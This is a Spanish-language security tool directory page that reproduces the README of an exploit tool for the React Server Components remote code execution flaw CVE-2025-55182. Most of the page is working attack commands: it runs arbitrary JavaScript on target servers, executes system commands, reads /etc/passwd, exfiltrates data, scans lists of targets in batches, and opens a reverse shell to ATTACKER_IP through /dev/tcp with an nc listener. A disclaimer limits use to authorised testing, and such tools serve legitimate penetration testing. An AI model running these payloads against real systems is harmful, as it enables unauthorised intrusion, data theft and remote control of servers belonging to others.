Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
React2Shell-CVE-2025-55182 — POC React2Shell-CVE-2025-55182 | Kitploit
Herramientas/GitHubGitHub/shadowroot97/react2shell-cve-2025-55182
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubshadowroot97/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

POC React2Shell-CVE-2025-55182

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 8 mesesAún no revisado

CVE-2025-55182 - React2Shell

root@kitploit:~
    ____  _____    _    ____ _____ ____  ____  _   _ _____ _     _
   |  _ \| ____|  / \  / ___|_   _|___ \/ ___|| | | | ____| |   | |
   | |_) |  _|   / _ \| |     | |   __) \___ \| |_| |  _| | |   | |
   |  _ <| |___ / ___ \ |___  | |  / __/ ___) |  _  | |___| |___| |___
   |_| \_\_____/_/   \_\____| |_| |_____|____/|_| |_|_____|_____|_____|
                                                    [ CVE-2025-55182 ]

Escáner de Ejecución Remota de Código para Componentes del Servidor React (RSC)

CVE Python


Créditos

RolNombreEnlace
Investigación OriginalLachlan Davidsongithub.com/lachlan2k

Basado en el PoC original: React2Shell-CVE-2025-55182-original-poc


Resumen

React2Shell es un escáner de seguridad integral para CVE-2025-55182, una vulnerabilidad crítica de Ejecución Remota de Código (RCE) que afecta implementaciones de Componentes del Servidor React (RSC). Esta vulnerabilidad permite a atacantes no autenticados ejecutar código JavaScript arbitrario en el servidor a través de una deserialización insegura en el protocolo React Flight.

Características principales

  • Pruebas Multi-Variante: Prueba 4 estructuras de payload diferentes de la investigación original
  • Detección de Versiones: Identifica versiones vulnerables de React y frameworks
  • Verificación RCE: Confirma la ejecución de código mediante variación de digest, temporización y callbacks OOB
  • Pruebas OOB: Soporte para Burp Collaborator e Interactsh
  • Payloads Personalizados: Ejecuta JavaScript arbitrario en servidores vulnerables
  • Extracción de Datos: Exfiltración carácter por carácter
  • Salida Profesional: Salida limpia y coloreada en terminal con recopilación de evidencia

Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/Shadowroot97/POC-React2Shell-CVE-2025-55182.git
cd POC-React2Shell-CVE-2025-55182

# Instalar dependencias
pip install requests

# Ejecutar el escáner
python3 exploit_cve_2025_55182_v2.py -h

Uso

root@kitploit:~
usage: exploit_cve_2025_55182_v2.py [-h] [-t TARGET] [-f FILE] [-m {version,verify,custom}]
                                    [--js JS] [--extract] [--sleep SECONDS]
                                    [--callback URL] [--dns DOMAIN] [-v]
                                    [--no-color] [--timeout TIMEOUT]

Modos de Escaneo

1. Modo Versión (predeterminado)

Detecta pasivamente versiones vulnerables de React y frameworks:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -t https://target.com

2. Modo Verificar (-m verify)

Confirma activamente RCE usando múltiples técnicas y las 4 variantes de payload:

root@kitploit:~
# Verificación básica (variación de digest)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# Con verificación basada en tiempo
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --sleep 5

# Con callback OOB (Burp Collaborator)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --callback abc123.oastify.com

# Verificación completa con salida detallada
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback abc123.oastify.com --dns abc123.oastify.com -v

3. Modo Personalizado (-m custom)

Ejecuta payloads JavaScript arbitrarios:

root@kitploit:~
# Obtener versión de Node.js
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Ejecutar comando del sistema
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('id').toString()" --extract

# Leer archivo
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('fs').readFileSync('/etc/passwd','utf8')" --extract

4. Escaneo por Lotes (-f)

Escanea múltiples URLs desde un archivo y muestra solo los objetivos vulnerables:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -f targets.txt

Ejemplos

Escaneos Básicos

root@kitploit:~
# Detección de versión (modo predeterminado)
python3 exploit_cve_2025_55182_v2.py -t https://target.com

# Verificación RCE
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# Escaneo por lotes de múltiples objetivos
python3 exploit_cve_2025_55182_v2.py -f targets.txt

# Salida detallada
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify -v

Uso Avanzado

root@kitploit:~
# Verificación basada en tiempo + OOB
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback your-id.oastify.com

# Extraer información del servidor
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# Ejecutar comando
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('whoami').toString()" --extract

Reverse Shell

root@kitploit:~
# Iniciar listener
nc -lvnp 443

# Ejecutar reverse shell
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"')"

Descargo de Responsabilidad

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos.

  • Úsela solo contra sistemas que posea o para los que tenga permiso explícito de prueba
  • El acceso no autorizado a sistemas informáticos es ilegal
  • Los autores no se hacen responsables del uso indebido de esta herramienta
  • Siempre siga las prácticas de divulgación responsable

Referencias

  • CVE-2025-55182 - NVD
  • PoC original por Lachlan Davidson
  • Aviso de Seguridad de React
  • Aviso de Seguridad de Next.js
  • Documentación de Componentes del Servidor React
Descargar herramienta
ArgumentoDescripción
-t, --targetURL objetivo (ej. https://example.com)
-f, --fileArchivo con lista de URLs (una por línea) para escaneo por lotes
-m, --modeModo de escaneo: version (predeterminado), verify o custom
--jsCódigo JavaScript para el modo custom
--extractExtraer resultado de cadena carácter por carácter
--sleep SECONDSVerificación RCE basada en tiempo (modo verify)
--callback URLURL de callback HTTP para pruebas OOB (modo verify)
--dns DOMAINDominio de callback DNS para pruebas OOB (modo verify)
-v, --verboseSalida detallada con detalles del payload
--no-colorDeshabilitar salida coloreada
--timeout SECONDSTiempo de espera de solicitud HTTP (predeterminado: 30)